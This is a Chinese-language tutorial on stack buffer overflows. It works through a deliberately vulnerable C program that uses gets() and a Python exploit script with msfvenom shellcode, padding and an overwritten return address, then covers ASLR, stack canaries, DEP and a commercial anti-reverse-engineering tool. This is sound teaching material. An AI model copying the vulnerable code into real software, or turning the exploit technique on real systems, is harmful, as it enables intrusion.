栈溢出攻击原理与防御

栈溢出攻击原理与防御

栈的结构与特性

栈（Stack）是用于存储函数调用过程中局部变量、参数、返回地址以及保存的寄存器值的内存区域。每次函数调用时，系统会在栈上分配一个栈帧。栈的生长方向是从高地址向低地址，而缓冲区数据的写入方向通常是从低地址向高地址，这一矛盾是栈溢出攻击得以实现的关键。

漏洞形成原理

函数调用时，返回地址被保存在栈帧中，以保证函数执行完毕后能正确返回到调用位置。如果程序在编写时未对缓冲区大小进行严格检查，攻击者通过输入超长数据可以覆盖栈上的返回地址。若精心构造输入数据，将返回地址修改为预先植入的恶意代码（shellcode）地址，即可劫持程序执行流程，造成安全漏洞。

栈帧的典型布局如下：

低地址 +------------------+ | 局部变量 | | buffer[N] | +------------------+ | 保存的 EBP | +------------------+ | 返回地址 | +------------------+ | 函数参数 | +------------------+ 高地址

漏洞复现实例

示例代码

编译时需关闭以下防护选项：

1. ASLR（地址空间布局随机化）
2. Stack Canary（/GS 安全检查）
3. DEP/NX（数据执行保护）

#include<stdio.h>#include<string.h>#include<windows.h>#include<stdlib.h>__declspec(noinline)voidvulnerable(){charbuffer[64];printf("[+] 缓冲区地址: 0x%p\n",buffer);gets(buffer);// 危险函数，不检查输入长度printf("[+] 输入内容: %s\n",buffer);}intmain(){printf("=== 栈溢出演示程序 ===\n");printf("[+] 按 Ctrl+C 退出\n");printf("[+] 输入超长字符串触发溢出\n\n");while(1){vulnerable();}return0;}

攻击脚本

if__name__=="__main__":# 使用 msfvenom 生成的 shellcode，弹窗示例shellcode=b""shellcode+=b"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52"shellcode+=b"\x30\x8b\x52\x0c\x89\xe5\x8b\x52\x14\x31\xff\x8b"shellcode+=b"\x72\x28\x0f\xb7\x4a\x26\x31\xc0\xac\x3c\x61\x7c"shellcode+=b"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52"shellcode+=b"\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"shellcode+=b"\x85\xc0\x74\x4c\x01\xd0\x8b\x58\x20\x01\xd3\x50"shellcode+=b"\x8b\x48\x18\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x01"shellcode+=b"\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38"shellcode+=b"\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58"shellcode+=b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"shellcode+=b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b"shellcode+=b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12"shellcode+=b"\xe9\x80\xff\xff\xff\x5d\xe8\x0b\x00\x00\x00\x75"shellcode+=b"\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x68\x4c"shellcode+=b"\x77\x26\x07\xff\xd5\x6a\x00\xe8\x06\x00\x00\x00"shellcode+=b"\x50\x77\x6e\x65\x64\x00\xe8\x07\x00\x00\x00\x48"shellcode+=b"\x61\x63\x6b\x65\x64\x00\x6a\x00\x68\x45\x83\x56"shellcode+=b"\x07\xff\xd5\x6a\x00\x68\xf0\xb5\xa2\x56\xff\xd5"padding=b'\xeb\x46'# 短跳转指令padding+=b'A'*(62+4)# 填充至返回地址前ret_addr=b'\xe4\xee\x19\x00'# 覆盖的返回地址（示例）payload=padding+ret_addr+b'\x90'*0x10+shellcodewithopen('payload.bin','wb')asf:f.write(payload)

提示：可使用msfvenom生成 shellcode，例如：

msfvenom-pwindows/messageboxTEXT="Hacked"TITLE="Pwned"-fpy-ax86

执行方式

stackoverflow.exe < payload.bin

执行成功后，将触发预设的 shellcode，例如弹窗提示：

常见防护机制

ASLR（地址空间布局随机化）

ASLR 使栈、堆和动态库的加载地址在每次程序运行时随机变化，攻击者难以预测关键地址，从而阻止基于固定地址的攻击。

Stack Canary（栈保护）

编译器在缓冲区与返回地址之间插入一个随机值（Canary）。函数返回前校验该值是否被修改，若检测到溢出则终止程序。

+------------------+ | 返回地址 | +------------------+ | Canary | ← 溢出覆盖会触发检测 +------------------+ | 局部变量 | +------------------+

DEP/NX（数据执行保护）

将栈、堆等数据区域标记为不可执行，即使攻击者成功注入 shellcode 并跳转至该区域，CPU 也会拒绝执行，抛出异常。

程序防护实践

栈溢出攻击通常依赖于对目标程序的逆向分析，包括定位危险函数、分析栈布局与计算偏移量。因此，增强程序的反逆向能力可作为有效的防御补充。使用保护工具如Virbox Protector可实现以下防护：

防止静态分析

• 代码虚拟化：将关键函数转换为私有指令集，使反汇编结果难以理解
• 代码混淆：通过控制流平坦化与虚假分支干扰分析逻辑
• 代码加密：代码段加密存储，运行时动态解密
• 导入表保护：隐藏外部函数依赖，增加定位危险函数的难度
• 移除调试信息：清除符号表与函数名，提升逆向成本

防止动态调试

• 调试器检测：识别调试器附加行为，并采取终止或反制措施
• 内存完整性校验：运行时检查代码段是否被修改或设置断点

通过理解栈溢出原理、熟悉攻击手法，并采取相应的编译选项与代码保护措施，可显著提升软件的安全性，防范此类经典内存漏洞的利用。